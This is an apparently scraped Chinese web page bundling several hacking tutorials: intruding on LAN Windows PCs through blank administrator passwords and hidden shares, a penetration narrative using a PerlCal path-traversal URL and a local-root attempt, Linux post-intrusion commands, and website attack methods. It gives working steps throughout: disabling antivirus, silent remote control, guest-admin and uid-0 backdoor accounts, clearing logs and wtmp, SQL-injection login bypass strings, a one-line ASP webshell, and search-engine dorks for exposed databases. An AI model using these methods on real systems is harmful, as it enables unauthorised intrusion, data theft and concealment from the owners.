如何入侵XP(xp入侵教程)

时间:2024-03-04 07:37:25 其他范文 收藏本文 下载本文

如何入侵XP(xp入侵教程)(共7篇)由网友“lunuy877”投稿提供,以下是小编为大家准备的如何入侵XP(xp入侵教程),仅供参考,欢迎大家阅读。

如何入侵XP(xp入侵教程)

篇1:局域网入侵教程

首先申明:

1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子, 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。) 入侵步骤: 1.使用“NTscan变态扫描器”,在IP处填上要扫描的IP范围,选择“WMI扫描”方式,按“开始”后就等扫描结果了。

2.使用“Recton--D贺免杀专用版” 选择“CMD命令”项,在“CMD:”中输入“net share C$=C:\”,即可开启远程主机的C盘共享,以此将“C”换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入“\\对方IP\C$”,即可进入对方C盘。 选择“Telnet”项,在“远程主机”中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在“CMD选项”中,执行命令:“net share ipc$”,接着执行:“net share admin$”,最后执行“net use \\***.***.***.***\IPC$ ”“ /user:administrator”在*处填入你入侵的主机IP。

3.使用“DameWare迷你中文版 4.5”,安装后点“DameWare Mini Remote Control”,在“帮助”项中选择激活产品,输入注册信息,成功注册后,进入“远程连接”窗口,在“主机”处填入IP地址,点“设置”,在“服务安装选项”中点“编辑”后,在“通知对话框”中去掉“连接时通知”,在“附加设置”中全都不选,在“用户选项”中去掉“启用用户选项菜单”。设置完成好后,就可点“连接”,在弹出的对话框中点“确定”后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份,

入侵步骤补充: 1.在以上第2步中,远程启动Telnet服务可以通过“我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动”完成。

2.Recton--D贺免杀专用版还有其他功能,在“进程”项中,可以查看远程主机的进程,并可任意结束其中进程;在“共享”项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\,D:\等,共享好后在地址栏中输入“\\IP\C$”,进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选“日志”,清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先“telnet IP”,telnet上去,键入y后输入的用户名“administrator”,密码为空, 进入后,开共享用net share命令,共享C$(即C盘):“net share C$=C:”,共享system文件夹:“net share c=c:\winnt\system32”,共享IPC$用:“net share IPC$”等,最后是关闭共享,关闭C盘共享:“net share C$ /del”。

4.为方便下次入侵,可以设置后门, 查看用户:“net user”,激活guest用户 “net user guest /active:yes”,更改guest的密码为poco:“net user guest poco”,把guest的权限提升为管理员权限:“net localgroup administrators guest /add”。 5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:“”dir d:\“,查看C盘program file文件夹:”dir c:\PROGRA~1\;“,60秒倒记时关机:”shutdown -s -t 60“

篇2:无线网络入侵教程

相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单,

无线网络入侵教程

部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技

篇3:如何入侵XP(xp入侵教程)

最近有好多人都在问如何入侵XP,而且还都在用入侵的老方法对付XP。这是行不通的。 我做了一个总结,看看可以使你对XP有一个清醒的认识,并从中找出一些入侵XP的好的方法,

入侵xp一向来都是很困难,但并不是不能入侵。 只是xp的安全性相对于windows其它糸

篇4:如何入侵博客(博客入侵教程)

漏洞一:数据库下载漏洞 第一步,搜索攻击目标 打开搜索引擎,搜索Pragram by Dlog,可以找到许多博客页面,这些博客都是使用Dlog破废墟修改版建立的,

如何入侵博客(博客入侵教程)

我们要找的叶面是存在暴库漏洞的1.2版本。许多用户都忽视了这个版本中内嵌的eWebEditor在线编辑数据库的

篇5:渗透入侵教程分析

废话不说,开工

C:\Documents and Settings\Administrator>ping www.xxx.com

Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Ping statistics for 192.168.0.252:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

文章中IP为假的 在这里不公布真正IP

看TTL的返回信息判断系统应该不是真的 现在可以改这个

先扫描他看看吧

结果只开了 21 22 80

看来成功率不算打 FTP并没有若口令 80也没什么信息

看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。

首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。

看看服务器开的端口情况

开了 21 22 80 也没什么漏洞

在看看news.xxx.com

经过扫描 判断服务器应该是 NT/

21 80 389 1002 3389

基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧登陆看看系统

2000server的

news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。

有点郁闷了

jswz.xxx.com

也是一个分页 不过这个另我非常的意外 用的是cgi的 系统是linux

21 22 80

扫了一下有个漏洞

cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来

去了国外的几个站 终于发现了~~~

Name : PerlCal

About : cal_make.pl of the PerlCal script. may allow remote users(website visitors) to vIEw any file on a webserver

(dependingon the user the webserver is running on).

Exploit:

_make.pl?\” target=_blank>www.VULNERABLE.com/cgi-bin/cal_make.pl?\

p0=../../../../../../../../../../../../etc/passwd

by: stan

呵呵 感谢hack.co.za

在浏览器地址栏输入

_make.pl?p0=../../../../../../../../../../../../../etc/passwd“ target=_blank>www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd

好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃!

想办法 跑这些用户吧~~~

提炼用户名 希望有弱口令

提炼过程大家参考一些资料去吧

一共20多个用户 跑出来了2个 哈哈,

。~~

用SSH登陆~

权限似乎非常低

用第二个试试

哎 还是一样

看看提升权限吧~~

经过一番折腾 100%确定是rh73 内核Linux kernel 2.4

用do_brk的益出~

#include

#include

#include

char hellc0de[] =

”\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65“

”\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74“

”\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30“

”\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20“

”\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74“

”\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75“

”\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh“;

int main

{

FILE *fp;

char *offset;

fp=fopen(”/tmp/own.c“,”w“);

fprintf(fp,”%s“,hellc0de);

fclose(fp);

system(”gcc -shared -o /tmp/own.so /tmp/own.c;rm /tmp/own.c“);

system(”LD_PRELOAD=/tmp/own.so /bin/sh“);

return 0;

}

郁闷 行不通

想别的办法

试试 do_mremap VMA本地权限提升漏洞

Linux内核中mremap(2)系统调用由于没有对函数返回值进行检查,本地攻击者可以利用这个漏洞获得root用户权限。

mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。mremap()系统调用提供对已存在虚拟内存区域调整大小。从VMA区域移动部分虚拟内存到新的区域需要建立一个新的VMA描述符,也就是把由VMA描述的下面的页面表条目(page table entrIEs)从老的区域拷贝到进程页表中新的位置。

要完成这个任务do_mremap代码需要调用do_munmap()内部内核函数去清除在新位置中任何已经存在的内存映射,也就是删除旧的虚拟内存映射。不幸的是代码没有对do_munmap()函数的返回值进行检查,如果可用VMA描述符的最大数已经超出,那么函数调用就可能失败。

:):):)

[1] [2] 下一页

篇6:linux入侵常用命令服务器教程

cat /etc/passwd 查看linux用户cat /etc/shadow 查看用户密码需要root权限

cat /etc/passwd 查看linux用户

cat /etc/shadow 查看用户密码需要root权限

cat /etc/sysconfig/network-scripts/ifcfg-ethn  N代表网卡号 查看所在网卡的ip信息

ifconfig 查看本机ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反弹的shell中使用可以直观显示命令

bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt,当你以Root登陆时,你的prompt会变成

bash#。

系统变量 : 试着echo ”$USER / $EUID“ 系统应该会告诉你它认为你是什么用户。

echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!

netstat -an grep LISTEN grep :80 查看端口

service --status-all grep running

service --status-all grep http

查看运行服务

lsb_release -a  查看系统版本

重启ssh服务 :/usr/sbin/sshd stop

/usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no,

将其改为

PasswordAuthentication yes

远程ssh才可登录

否则显示Access denied

其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

su的菜鸟用法

先chomod 777 /etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后cp /bin/bash /sbin/nologin

然后su的时候su - bin就可以到rootshell了,

这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

还可以这样

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo ”nosec:x:0:0::/:/bin/sh“ >>/etc/passwd

echo ”nosec::-1:-1:-1:-1:-1:-1:500" >>/etc/shadow

清空last记录 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero f=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

篇7:网站教程了解网站入侵的常用方法

首先,观察指定网站,

入侵指定网站是需要条件的:

要先观察这个网站是动态还是静态的。

首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、JSP等代码编写的站点

如果是静态的(.htm或html),一般是不会成功的。

如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

以下是入侵网站常用方法:

1.上传漏洞

如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞

字符过滤不严造成的

3.暴库:把二级目录中间的/换成%5c

4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’a’=’a

5.社会工程学。这个我们都知道吧。就是猜解。

6.写入ASP格式数据库。就是一句话木马〈%execute request(“value”)%〉 (数据库必需得是ASP或ASA的后缀)

7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.

比如:默认数据库,默认后台地址,默认管理员帐号密码等

8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

s/Databackup/dvbbs7.MDB

s/Data/dvbbs7.MDB

/data/dvbbs7.mdb

s/diy.asp

/diy.asp

s/cmd.asp

s/cmd.exe

s/s-u.exe

srvu.exe

工具:网站猎手 挖掘鸡 明小子

9.查看目录法:一些网站可以断开目录,可以访问目录,

210.37.95.65 images

10.工具溢出

11.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多,自已找〉

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

12.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

13.利用常见的漏洞:如动网BBS

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

这个我就不做了,网上教程多的是,自已下个看看。

工具:dvbbs权限提升工具 动网固顶贴工具

14.还有一些老漏洞。如IIS3,4的查看源码,5的Delete

CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

Windows 服务器入侵前兆检测方法技巧服务器教程

如何防范网站数据库入侵

Windows系统安全设置方法中级安全篇服务器教程

Windows 安全审核让入侵者无处遁形服务器教程

防火墙在网络安全中的重要功能和作用服务器教程

Windows XP 组策略之安全篇服务器教程

win内置防火墙配置教程服务器教程

Windows 服务器的安全防护林

计算机系毕业论文

入侵后的3个重要痕迹清理

如何入侵XP(xp入侵教程)
《如何入侵XP(xp入侵教程).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【如何入侵XP(xp入侵教程)(共7篇)】相关文章:

winserver终端服务自带的一些工具的简介2023-09-13

NFS服务器安全的解析和解决2024-04-10

服务器专用软件防火墙点评2022-05-08

金山毒霸使用教程之清理专家功能篇2022-10-25

金山毒霸使用教程之防御监控2023-08-01

网站科普:一张图带你了解网站的内部结构2023-07-22

计算机毕业论文范文模板2023-10-18

qq远程协助怎么用,教您如何使用QQ远程协助2023-06-28

教你熟知Cookies文件的欺骗2023-04-10

计算机网络信息安全现况论文2023-07-15